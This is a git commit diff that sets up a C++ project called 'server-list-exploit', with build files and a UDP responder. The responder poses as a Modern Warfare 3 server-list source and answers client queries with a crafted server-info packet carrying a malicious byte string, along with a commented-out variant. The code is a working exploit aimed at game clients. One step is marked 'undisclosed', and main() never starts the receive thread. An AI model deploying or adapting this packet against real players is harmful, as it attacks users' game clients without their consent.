commit 532838ca8edee91974afa858ddc2de84b0f85573 Author: Diavolo Date: Tue May 11 09:33:54 2021 +0200 Init diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..d1c0f69 --- /dev/null +++ b/.gitignore @@ -0,0 +1,153 @@ +### Windows + +# Windows image file caches +Thumbs.db +ehthumbs.db + +# Folder config file +Desktop.ini + +# Recycle Bin used on file shares +$RECYCLE.BIN/ + +# Windows Installer files +*.cab +*.msi +*.msm +*.msp + +# Shortcuts +*.lnk + +### OSX + +.DS_Store +.AppleDouble +.LSOverride + +# Icon must end with two \r +Icon + +# Thumbnails +._* + +# Files that might appear on external disk +.Spotlight-V100 +.Trashes + +# Directories potentially created on remote AFP share +.AppleDB +.AppleDesktop +Network Trash Folder +Temporary Items +.apdisk + +### Visual Studio + +# User-specific files +*.suo +*.user +*.userosscache +*.sln.docstates + +# User-specific files (MonoDevelop/Xamarin Studio) +*.userprefs + +# Build results +build + +# Visual Studio 2015 cache/options directory +.vs/ + +#Visual Studio Code +.vscode/ + +# MSTest test Results +[Tt]est[Rr]esult*/ +[Bb]uild[Ll]og.* + +*_i.c +*_p.c +*_i.h +*.ilk +*.meta +*.obj +*.pch +*.pdb +*.pgc +*.pgd +*.rsp +*.sbr +*.tlb +*.tli +*.tlh +*.tmp +*.tmp_proj +*.log +*.vspscc +*.vssscc +.builds +*.pidb +*.svclog +*.scc + +# Visual C++ cache files +ipch/ +*.aps +*.ncb +*.opendb +*.opensdf +*.sdf +*.cachefile + +# Visual Studio profiler +*.psess +*.vsp +*.vspx +*.sap + +# TFS 2012 Local Workspace +$tf/ + +# Guidance Automation Toolkit +*.gpState + +# Visual Studio cache files +# files ending in .cache can be ignored +*.[Cc]ache +# but keep track of directories ending in .cache +!*.[Cc]ache/ + +# Others +~$* +*~ +*.dbmdl +*.dbproj.schemaview +*.pfx +*.publishsettings + +# Backup & report files from converting an old project file +# to a newer Visual Studio version. Backup files are not needed, +# because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm + +# SQL Server files +*.mdf +*.ldf + +### IDA +*.id0 +*.id1 +*.id2 +*.nam +*.til + +### Custom user files +# User scripts +user*.bat + +# Premake binary +#premake5.exe \ No newline at end of file diff --git a/generate.bat b/generate.bat new file mode 100644 index 0000000..b9ffdf6 --- /dev/null +++ b/generate.bat @@ -0,0 +1,3 @@ +@echo off +git submodule update --init --recursive +tools\premake5 %* vs2019 \ No newline at end of file diff --git a/premake5.lua b/premake5.lua new file mode 100644 index 0000000..01b23e0 --- /dev/null +++ b/premake5.lua @@ -0,0 +1,108 @@ +dependencies = { + basePath = "./deps" +} + +function dependencies.load() + dir = path.join(dependencies.basePath, "premake/*.lua") + deps = os.matchfiles(dir) + + for i, dep in pairs(deps) do + dep = dep:gsub(".lua", "") + require(dep) + end +end + +function dependencies.imports() + for i, proj in pairs(dependencies) do + if type(i) == 'number' then + proj.import() + end + end +end + +function dependencies.projects() + for i, proj in pairs(dependencies) do + if type(i) == 'number' then + proj.project() + end + end +end + +newoption { + trigger = "copy-to", + description = "Optional, copy the EXE to a custom folder after build, define the path here if wanted.", + value = "PATH" +} + +newoption { + trigger = "dev-build", + description = "Enable development builds of the client." +} + +dependencies.load() + +workspace "server-list-exploit" +location "./build" +objdir "%{wks.location}/obj" +targetdir "%{wks.location}/bin/%{cfg.platform}/%{cfg.buildcfg}" + +configurations {"Debug", "Release"} + +architecture "x86" +platforms "x86" + +systemversion "latest" +symbols "On" +staticruntime "On" +editandcontinue "Off" +warnings "Extra" +characterset "ASCII" + +if _OPTIONS["dev-build"] then + defines {"DEV_BUILD"} +end + +flags {"NoIncrementalLink", "NoMinimalRebuild", "MultiProcessorCompile", "No64BitChecks" } + +filter "action:vs*" +buildoptions "/std:c++17" +defines { "_WINDOWS", "WIN32" } + +filter "action:gmake*" +cppdialect "C++17" +buildoptions "-std=c++17" +defines { "_LINUX" } + +configuration "Release" +optimize "Size" +-- buildoptions {"/GL"} +-- linkoptions { "/IGNORE:4702", "/LTCG" } + +defines {"NDEBUG"} + +flags {"FatalCompileWarnings"} + +configuration "Debug" +optimize "Debug" + +defines {"DEBUG", "_DEBUG"} + +configuration {} + +project "server-list-exploit" +kind "ConsoleApp" +language "C++" + +pchheader "stdinc.hpp" +pchsource "src/stdinc.cpp" + +files {"./src/**.hpp", "./src/**.cpp"} + +includedirs {"./src", "%{prj.location}/src"} + +-- links {"kernel32", "user32", "Ws2_32"} + +dependencies.imports() + +group "Dependencies" +dependencies.projects() \ No newline at end of file diff --git a/src/main.cpp b/src/main.cpp new file mode 100644 index 0000000..eb11ba6 --- /dev/null +++ b/src/main.cpp @@ -0,0 +1,94 @@ +#include "stdinc.hpp" +#include "main.hpp" + +#define MW3_SERVER_4CC 0x504F4F4C +#define BUF_SIZE 1024 + +SOCKET sock; + +bool startUp() +{ + WSADATA wsa_data; + WSAStartup(MAKEWORD(2, 2), &wsa_data); + + sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); + if (INVALID_SOCKET == sock) + { + printf("Can't initialize socket\n"); + return false; + } + + sockaddr_in service; + service.sin_family = AF_INET; + service.sin_addr.s_addr = htonl(INADDR_ANY); + +// net_masterServerPort + service.sin_port = htons(27014); + int result = bind(sock, (SOCKADDR*)&service, sizeof(service)); + if (SOCKET_ERROR == result) + { + printf("Can't bind socket\n"); + closesocket(sock); + return false; + } + + + return true; +} + +DWORD WINAPI recvTh(LPVOID) +{ + auto buf = std::make_unique(BUF_SIZE); + + u_long iMode = 1; + ioctlsocket(sock, FIONBIO, &iMode); + + sockaddr_in sender{}; + int senderSize = sizeof(sender); + serverInfo_t info{}; + +// undisclosed step + info.serverName_ptr = 0; + info.rawDataSize = INFO_MAX_DATA; + SecureZeroMemory(&info.rawData, info.rawDataSize); + + while (1) + { + SecureZeroMemory(buf.get(), BUF_SIZE); + auto len = recvfrom(sock, buf.get(), BUF_SIZE, 0, (SOCKADDR*)&sender, &senderSize); + + if (len == SOCKET_ERROR) + { + return -1; + } + + if (len == sizeof(serverQuery_t)) + { + auto* packet = (serverQuery_t*)buf.get(); + + if (packet->magic4CC == MW3_SERVER_4CC) + { + printf("Server is sending info to a client\n"); + auto bad_string = "\x5e\x01\xCC\xCC\x0C" "depthprepass"s; +// auto bad_string = "\x5e\x01\xCC\xCC\x0A" "shellshock"s; + std::memcpy(&info.rawData[info.serverName_ptr], bad_string.data(), bad_string.length() + 1); + sendto(sock, (char*)&info, sizeof(serverInfo_t), 0, (SOCKADDR*)&sender, senderSize); + } + } +#ifdef _LINUX + sleep(1000); +#else + Sleep(1); +#endif + } +} + +int main(int, char**) +{ + if (!startUp()) + { + return 1; + } + + WSACleanup(); +} diff --git a/src/main.hpp b/src/main.hpp new file mode 100644 index 0000000..5d535a0 --- /dev/null +++ b/src/main.hpp @@ -0,0 +1,39 @@ +#pragma once + +#define INFO_MAX_DATA 2048 + +#pragma pack(1) + +typedef struct +{ + uint32_t magic4CC; + uint32_t timeStamp; +} serverQuery_t; + +typedef struct +{ + uint32_t magic4CC; + uint32_t timeStamp; + int32_t players; + int32_t maxPlayers; + bool bPasswordProtected; + uint32_t bDedicated; + int32_t serverVersion; + uint64_t SteamId; + uint32_t gameIP_int; + uint32_t gameIP_ext; + uint16_t gamePort; + uint16_t queryPort; + uint16_t netPort; + char secID[8]; + char secKey[16]; + uint16_t mapName_ptr; + uint16_t serverName_ptr; + uint16_t serverTags_ptr; + uint16_t serverInfos_ptr; + uint16_t rawDataSize; + char rawData[INFO_MAX_DATA]; + +} serverInfo_t; + +#pragma pack() \ No newline at end of file diff --git a/src/stdinc.cpp b/src/stdinc.cpp new file mode 100644 index 0000000..ea7961b --- /dev/null +++ b/src/stdinc.cpp @@ -0,0 +1 @@ +#include "stdinc.hpp" \ No newline at end of file diff --git a/src/stdinc.hpp b/src/stdinc.hpp new file mode 100644 index 0000000..8003163 --- /dev/null +++ b/src/stdinc.hpp @@ -0,0 +1,34 @@ +#ifdef _LINUX +#pragma clang diagnostic push +#pragma clang diagnostic ignored "-Wpragma-pack" +#endif + +// defines +#define WIN32_LEAN_AND_MEAN + +// windows headers +#include +#include +#include +#include +#include +#include +#include +#pragma comment (lib, "Ws2_32.lib") + +// std includes +#include + +#ifdef _LINUX +#include +#endif + +using namespace std::literals; + +// c types + +#include + +#ifdef _LINUX +#pragma clang diagnostic pop +#endif \ No newline at end of file diff --git a/tools/premake5.exe b/tools/premake5.exe new file mode 100644 index 0000000..0e4954f Binary files /dev/null and b/tools/premake5.exe differ